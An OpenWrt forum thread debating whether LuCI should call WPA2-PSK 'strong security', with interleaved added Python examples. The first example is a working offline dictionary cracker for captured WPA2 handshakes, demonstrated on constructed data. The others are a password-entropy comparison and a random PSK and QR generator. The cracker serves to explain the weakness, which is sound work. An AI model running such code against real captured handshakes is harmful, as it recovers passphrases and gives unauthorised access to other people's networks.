WPA2-PSK "strong security"?

I just installed 23.05.2 and found that the Wireless Security Encryption drop-down menu indicates "(strong security)" for WPA2-PSK.

In my opinion, "strong security" hasn't been true since KRACK in 2017. (For instance, see this article.)

There's also the issue of it being easy to capture the encrypted password, and then it is just a matter of high-speed guessing of the password. See this recent article that mentions cracking 5,000 passwords from 10,000 wifi captures. A single NVIDIA 3070 Ti GPU can try ("guess") 1 million WPA2-PSK passwords every 2 seconds. Needless to say, the guesses are intelligent, not dumb.

I suggest that the menu item be changed to reflect current reality. Maybe "Good security"? I wouldn't want anyone to face a claim of misleading statements about security.

4 Likes
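
The offline attack the post above refers to, as an added worked example (this is not code from the original post or from OpenWrt): a WPA2-PSK 4-way handshake capture is attacked by re-deriving PMK (PBKDF2-HMAC-SHA1 over the passphrase, salted only with the public SSID), then KCK, then the EAPOL message-2 MIC for every candidate passphrase until one matches. The SSID, MAC addresses, nonces, EAPOL frame and wordlist below are all constructed inline for the demo; nothing touches a real network.

```python
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81  # MIC field in an EAPOL-Key frame: 4-byte 802.1X header + 77 bytes of key-descriptor fields


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    The salt is the public SSID, so the PMK is the same for every station and can be guessed offline."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces));
    its first 16 bytes are the KCK that keys the handshake MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (STA -> AP) with the MIC field zeroed and no key data."""
    body = (b"\x02"                                   # descriptor type: RSN
            + b"\x01\x0a"                             # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit
            + b"\x00\x10"                             # key length 16 (CCMP)
            + (1).to_bytes(8, "big")                  # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, key IV, key RSC, key ID
            + bytes(16)                               # MIC, zeroed
            + bytes(2))                               # key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key


def with_mic(frame: bytes, mic: bytes) -> bytes:
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
                    msg2: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: per candidate derive PMK -> KCK -> MIC and compare with the captured MIC.
    Nothing is sent to the AP, so no rate limiting applies; each guess costs the 2x4096 HMAC-SHA1 of PBKDF2."""
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = with_mic(msg2, bytes(16))
    for pw in candidates:
        if not 8 <= len(pw) <= 63:  # outside WPA passphrase length bounds; skip without hashing
            continue
        kck = derive_kck(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return pw
    return None


# --- constructed "capture" parameters (hypothetical values, no real network) ---
SSID = "HomeNet"
AP_MAC = bytes.fromhex("02aabbccddee")
STA_MAC = bytes.fromhex("021122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def make_capture(passphrase: str) -> bytes:
    """Simulate the sniffed message 2: the STA's frame carrying a valid MIC for `passphrase`."""
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_msg2(SNONCE)
    return with_mic(frame, eapol_mic(kck, frame))


def demo() -> Optional[str]:
    captured_msg2 = make_capture("sunflower2019")  # the network's real (weak, human-chosen) passphrase
    wordlist = ["password", "Sunflower", "sunflower2018", "sunflower2019", "tooshort"]  # constructed
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The point to take from the code: everything needed to check a guess (SSID, both MACs, both nonces, the MIC) is in cleartext on the air, and the only per-guess work is the PBKDF2, which is exactly what a GPU parallelises. Nothing in the protocol limits the attacker; only the passphrase's entropy does, which is why the mixed-mode and password-rotation concerns raised later in the thread matter.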

On a tangential but related note, if you change the root password within LuCI, it has a warning about password strength that is entirely outdated and wrong. Using an 8-word diceware password, LuCI still complains that it is "weak".

As a solution, I propose that OpenWrt adopt a direct link on LuCI's password page to the XKCD "correct horse battery staple" comic:

https://xkcd.com/936/

:nerd_face:

5 Likes
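
To make the complaint above concrete, here is an added example (not code from the post, from LuCI, or from OpenWrt) contrasting a character-class heuristic of the kind many password meters use with an estimate of generation entropy. The heuristic thresholds are my own construction for illustration, not LuCI's actual rules; the guess rate is the figure quoted earlier in the thread (1 million guesses per 2 seconds on one GPU).

```python
import math
import string

WORDLIST_SIZE = 7776        # a standard Diceware list: 6**5 words
GUESSES_PER_SECOND = 5e5    # from the thread: 1 million WPA2-PSK guesses every 2 s on a single RTX 3070 Ti


def charclass_verdict(pw: str) -> str:
    """Character-class heuristic constructed for comparison (assumed thresholds, not LuCI's code):
    counts lower/upper/digit/symbol classes and only credits length up to 12 characters."""
    classes = sum([any(c.islower() for c in pw), any(c.isupper() for c in pw),
                   any(c.isdigit() for c in pw), any(c in string.punctuation for c in pw)])
    if len(pw) < 8 or classes < 2:
        return "weak"
    if len(pw) < 12 or classes < 3:
        return "medium"
    return "strong"


def entropy_bits(pw: str, wordlist_size: int = WORDLIST_SIZE) -> float:
    """Entropy of the generation process, which is what resists offline guessing.
    Space-separated lowercase words are scored as Diceware draws: log2(wordlist) bits per word.
    Anything else is scored as uniformly random characters over the classes it uses; that is an
    upper bound, because human-chosen strings such as 'Tr0ub4dor&3' are far from uniform."""
    words = pw.split(" ")
    if len(words) > 1 and all(w.isalpha() and w.islower() for w in words):
        return len(words) * math.log2(wordlist_size)
    alphabet = 0
    if any(c.islower() for c in pw):
        alphabet += 26
    if any(c.isupper() for c in pw):
        alphabet += 26
    if any(c.isdigit() for c in pw):
        alphabet += 10
    if any(c in string.punctuation for c in pw):
        alphabet += len(string.punctuation)
    return len(pw) * math.log2(alphabet) if alphabet else 0.0


def entropy_verdict(bits: float) -> str:
    """Bands chosen for this example (assumption): below 40 bits falls to a GPU in days at the quoted rate."""
    if bits < 40:
        return "weak"
    if bits < 80:
        return "medium"
    return "strong"


def expected_crack_years(bits: float, rate: float = GUESSES_PER_SECOND) -> float:
    """Expected time to hit the passphrase: half the keyspace at `rate` guesses per second."""
    return (2 ** bits / 2) / rate / (365 * 24 * 3600)


def compare(pw: str) -> dict:
    bits = entropy_bits(pw)
    return {"charclass": charclass_verdict(pw),
            "entropy_bits": round(bits, 1),
            "entropy": entropy_verdict(bits),
            "expected_years": expected_crack_years(bits)}


if __name__ == "__main__":
    for candidate in ["correct horse battery staple",
                      " ".join(["ember", "pylon", "quartz", "tundra", "mosaic", "violet", "cactus", "delta"]),
                      "Password1!"]:
        print(candidate, compare(candidate))
```

The four-word XKCD phrase is "weak" to the class counter (one class, spaces) yet carries about 52 bits and averages over a century at the quoted single-GPU rate; the eight-word phrase the poster used is over 100 bits. The class counter is the wrong tool for passphrases, which is the poster's point.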

Brute force will always work; that is a matter of time. That is why you don't use words in any way or form or in any combination.

The password lists that Kali Linux uses are something like 14 MB or even larger of a single long string of stolen passwords.
The more you know about your target, the more sophisticated settings you can use to crack the password.

I agree with the above comments but don't really want to go down the rabbit hole of what constitutes a good-enough password (dice ware, MFA, failed attempts, timeouts, etc). I hope this thread can concentrate on whether it is wise to call WPA2-PSK "strong security".

I will add one more thing: Since your WPA2 wifi traffic may have been captured already, its password may already have been captured (if not yet broken or tried). I would suggest that when a user switches to WPA3-SAE (from even the mixed WPA2/WPA3), the user is advised to create a new password, with an explanation why. Something like:

WPA2-PSK wifi signals can be captured and then later attacked to discover the password. When moving to a higher security mechanism (WPA3-SAE), choose a new password to avoid the security risk of a hacked old password.

It was you that dug the rabbit hole. If you don't like the answers, don't ask the question.

1 Like

I'm very sorry, but that is objectively false.

And I concur with @M_T that calling WPA2-PSK "strong security" is misleading. When you add the limitations that many client devices put on key complexity (i.e. smart TVs being used for streaming services which limit key length to 20 characters or a limited character set), "modest security" is even being generous.

All encryption will eventually and inevitably be compromised. In some cases this will be due to weaknesses in the arithmetic used to generate the encryption; in other cases this will be due to computers becoming ever faster and more powerful, making brute-force attacks trivial.

If you are concerned that the phrase "strong security" is misleading when describing WPA2-PSK, then I see three options open to you:

  • Submit a pull request for a change of wording in OpenWrt, and see if the project maintainers will accept your PR;
  • Migrate your own equipment from WPA2 to WPA3;
  • Petition manufacturers to deprecate WPA2 in favour of WPA3, even in older equipment which they no longer support.
3 Likes

Absolutely true, but on a practical timescale centered on the present, WPA2-PSK can firmly be considered "currently compromised" rather than "may be compromised at some arbitrary date in the future".

Fair enough.

:rofl:

Well, that "strong" security label is/was in relation to WEP (weak) and WPA1/2 mixed (medium). I am not tied to any specific wording, so I am open to more suitable suggestions. It just has to be terse and fit into a list of {WPA1 PSK, WPA1/2 PSK mixed, WPA2 PSK, WPA2 PSK/WPA3 SAE mixed, WPA3 SAE}

I could imagine dubbing WPA2 PSK as "average security". That would both imply that the security properties are not particularly outstanding and that it (still) is the most widely used protocol.

3 Likes

I would think it fair for the menu to be:

  • WPA3-SAE (strong security)
  • WPA2-PSK (average security)
  • WPA2-PSK/WPA3-SAE (average security)
  • WPA-PSK/WPA2-PSK (weak security)
  • WPA-PSK (weak security)
  • OWE (open network)
  • No encryption (open network)

As you noticed, I put the mixed modes with their weaker half. As a major risk is the compromise of passwords at the weaker half, the stronger half is then vulnerable to the compromised password. Weakest link. (I again suggest that a warning be added to change passwords when moving to a stronger security level.)

Or, you could go with best, better, weak or poor. I would stay away from calling WPA2-PSK "good security". I think "average" is better than "better".

3 Likes

"Average" sounds well balanced between "strong" and "weak".

However, "average" should only apply to WPA2+CCMP/AES. WPA2+TKIP should be "weak". Therefore "average/weak" with a sentence of explanation in Cipher section could make sense.

While we are at it, could we also consider discouraging people from using mixed modes? It's often more secure to set up 2 separate SSIDs than to run mixed. Especially if you can keep these WPA2 devices on a separate subnet and firewall them.

1 Like

You do know that WPA3 has officially already been cracked at least 2 times, so you can set "average" on that too.

Maybe we should invert the naming and flag those security options as compromised? Or just flag the ones that are weak?

Also, I don't get where WPA2 is considered compromised... The current vulnerabilities are in other kinds of parts and not strictly in the algorithm itself.

Also, WPA3 is still not that common to be considered "standard" and working with every device.

Also, provide articles that say WPA3 has been cracked... This may apply to old firmware and OEM ones. Not ours, which are updated as soon as the vulnerability is published.

4 Likes

Issues with WPA2:

  • doesn't feature forward secrecy. Recorded traffic can later be decrypted when the PSK is discovered.
  • some WPA2 devices don't support Protected Management Frames (802.11w), so such networks/devices are susceptible to deauth DoS and further attacks.
  • the PSK can be recovered offline from captured packets, especially since many people don't use long or complicated phrases.

Unfortunately WPA3 is being developed behind closed doors, so flaws are getting discovered:

Maybe we should have some kind of "security profiles"? For example:

  • most secure: "WPA3-EAP+CCMP+PMF required+KRACK"
  • most secure: "WPA2-EAP+CCMP+PMF required+KRACK"
  • most secure: "WPA2/WPA3-EAP+CCMP+PMF required+KRACK"
  • secure: "WPA3-PSK+PMF required+KRACK"
    • not sure if KRACK mitigation is needed for WPA3
    • not sure if there are WPA3-personal devices that don't support PMF
  • moderate: "WPA2-PSK+CCMP+PMF required+KRACK+password length of X"
  • moderate: "WPA2-PSK+CCMP+PMF optional+KRACK+password length of X"
    • PMF sometimes isn't supported by older IoT devices, etc.
  • custom: selecting custom shows the current UI where user can select anything.

Mitigation of bad passphrases could be done with a random PSK generator with a visible QR code.

I'd like a goal of this thread to be a consensus on what we agree, so that there's a basis for a PR to luci.

Edit: changed WPA2-EAP and mixed mode to "most secure" based on this lecture https://youtu.be/kEb0WKqAQ6c?si=kl5Axs4T-xeWGk2C (26:57)
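
The "random PSK generator with visible QR code" idea from the post above, as an added example (not code from the post or from OpenWrt): draw the passphrase from the OS CSPRNG, give it a length that even a key-limited client accepts, and emit the de facto `WIFI:` payload that phone cameras scan, with a parser to confirm the QR carries the key byte for byte. The `WIFI:` field layout and escaping follow the common ZXing convention; how individual readers label WPA3-only networks in the `T:` field varies, so that value is left as a parameter and is an assumption here. Rendering the string as an image is left to any QR encoder (for example the `qrencode` CLI).

```python
import math
import secrets
import string

# 62 symbols. Any printable ASCII is legal in a WPA passphrase, but this set avoids
# quoting trouble on devices with awkward input fields.
ALPHABET = string.ascii_letters + string.digits


def random_psk(length: int = 63) -> str:
    """Random WPA passphrase from the OS CSPRNG. WPA allows 8..63 characters; pass a shorter
    length for a client that caps the key (the thread mentions smart TVs limited to 20)."""
    if not 8 <= length <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def psk_entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Entropy of a uniformly random key of this length; 20 chars over 62 symbols is ~119 bits,
    so the length cap is not the problem, human-chosen keys are."""
    return length * math.log2(alphabet_size)


def _escape(s: str) -> str:
    # The WIFI: format reserves \ ; , " : and expects them backslash-escaped inside values.
    return "".join("\\" + c if c in '\\;,":' else c for c in s)


def wifi_qr_payload(ssid: str, psk: str, auth: str = "WPA", hidden: bool = False) -> str:
    """WIFI:T:<auth>;S:<ssid>;P:<psk>;[H:true;];  -- the payload phones scan to join a network.
    `auth` = "WPA" is what most readers accept for WPA2/WPA3-personal (assumption, reader-dependent)."""
    out = f"WIFI:T:{auth};S:{_escape(ssid)};P:{_escape(psk)};"
    if hidden:
        out += "H:true;"
    return out + ";"


def parse_wifi_qr_payload(payload: str) -> dict:
    """Inverse of wifi_qr_payload, honouring the escapes, so the generated QR can be verified
    to carry the exact key before it is printed and stuck on the router."""
    if not payload.startswith("WIFI:") or not payload.endswith(";;"):
        raise ValueError("not a WIFI: payload")
    body = payload[5:-1]  # drop "WIFI:" and the final terminating ';'
    fields, key, val, i = {}, None, [], 0
    while i < len(body):
        c = body[i]
        if c == "\\" and i + 1 < len(body):   # escaped reserved character: take it literally
            val.append(body[i + 1])
            i += 2
            continue
        if key is None and c == ":":          # end of the field name
            key = "".join(val)
            val = []
        elif c == ";":                        # end of the field value
            fields[key] = "".join(val)
            key, val = None, []
        else:
            val.append(c)
        i += 1
    return fields


def generate_and_verify(ssid: str, length: int = 63) -> dict:
    """Produce a fresh key plus its QR payload, and prove the payload round-trips."""
    psk = random_psk(length)
    payload = wifi_qr_payload(ssid, psk)
    parsed = parse_wifi_qr_payload(payload)
    assert parsed["S"] == ssid and parsed["P"] == psk
    return {"psk": psk, "bits": psk_entropy_bits(length), "payload": payload}


if __name__ == "__main__":
    result = generate_and_verify("HomeNet", 20)   # constructed SSID
    print(result["payload"])
    print(f"{result['bits']:.1f} bits of entropy")
```

The round-trip check matters because the reserved characters are exactly the ones a generator is likely to emit if it uses the full printable range; a misparsed QR gets the user to type the key by hand, and that is where weak keys come from.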

What has that to do with wpa2 strength?

That is the IoT engineers' fault; they cut the security down.

But what is the point, as NIST said? They all fall when quantum computers start to look at key cracking.

But there is already talk about WPA4 for Wi-Fi 7. So if and when WPA4 appears, let's hope they actually are future-proof.

So that's an example of "but technically...". The problem is that your weakest link anywhere in the network is what you have to worry about, and sometimes it's just not feasible for the average person to carefully vet the WiFi limitations of every device they own, especially since that information may not be possible to discover until after the device has been purchased.

If the key can trivially be captured, as it can with WPA2, then owning any device with a stupid limit on key complexity (of which there are many) means you are very vulnerable.

Fair point, though we're a few years away from that yet, and a very long time away from some random wardriver looking for free WiFi from the street outside your house having access to a quantum computer. If the NSA is after you, you've probably already lost no matter what you use.

:rofl: :rofl: :rofl:
WPA3 took, what, a solid decade to actually be widely available? I'll consider myself lucky to live long enough to see WPA4 in a real device.

That said, earlier in this thread you pointed out that WPA3 is more vulnerable than I realized, mostly but not entirely also because of stupid devices, so this whole topic is less useful than I originally thought.

Realistically, plain WPA2-PSK/CCMP (without 802.11w) is going to stay around for quite a long time to come, as most IoT or smart-home devices (or things like printers) rarely support WPA3 at all, even in new devices. E.g. the very common Espressif esp8266/esp8285 can't do WPA3, the newer esp32 could (but e.g. Tasmota can't right now). So even for users who care about this topic, I don't see a possibility to get rid of WPA2 within the next ~5 years; when it comes to 'normal' users you're looking at 10+ years…

We have seen how long it took to get rid of WPA1/TKIP or even WEP (and even today we're seeing complaints that OpenWrt no longer ships with WEP support), but the situation back then was a lot easier, as there weren't half a dozen to two dozen IoT or smart-home devices in a household, just add-on WLAN cards in computers (and later some gaming consoles). Devices that could be upgraded or were replaced/upgraded in a relatively quick cadence (compared to e.g. a washing machine; now think about printers, wireless surveillance cameras, smart light bulbs and things like that).

4 Likes

Just to add some examples which may have - and need WLAN features (and often not very good ones):

  • printers
  • cars (infotainment, OTA upgrades, …)
  • washing machines
  • pool pumps
  • heat pumps
  • solar inverters
  • smart plugs/ bulbs, buttons and sensors (temperature, etc.) of various kinds
4 Likes

Dear gawd...

Absolutely nothing against @slh for making the list but how did people become so dependent on the damn washing machine needing an internet connection??
The rest are arguable but...

THE WASHING MACHINE????!

2 Likes

I have none of those examples myself (apart from some esp8285, esp32 and esp32 c3 boards/plugs to play with, but without a hard task to cover), but there may be reasons for that.

The washing times of modern washing machines (including dumb ones) vary a lot (+/- an hour or more), depending on the weight of its load and when it considers it to be clean (so using the same washing program), furthermore the predicted washing time does change (a lot) over the course of its washing program to similar extents - so the time needed varies a lot and is unpredictable in its nature. If you imagine a larger house (be it a detached house or an apartment complex), where you don't keep your washing machine in your living area (e.g. kitchen or bathroom), but more distant (e.g. in the basement), I can understand a desire to get a wireless notification when the washing is ready (no, you may not be able to hear its acoustic signal in the basement).

Another desire might be for owners of solar installations to start the washing when there is lots of excess free electricity from your own solar cells, even when you're still at work.

Look at it from a different angle: I can buy an esp32 c6 for ~3.60 EUR (including VAT, tax and customs) in single quantities and with direct shipping from China; imagine another buck for a relay, and that's it in terms of the additional cost for these features for the manufacturer, so… why not? (Yes, you as the customer will have to part with way more than 5 bucks for this capability, but that's a different story; it may still pay off in the aforementioned circumstances.)

I like these kinds of devices to be dumb, less stuff to break, less of a security nightmare - but I do understand that others might have different priorities.

1 Like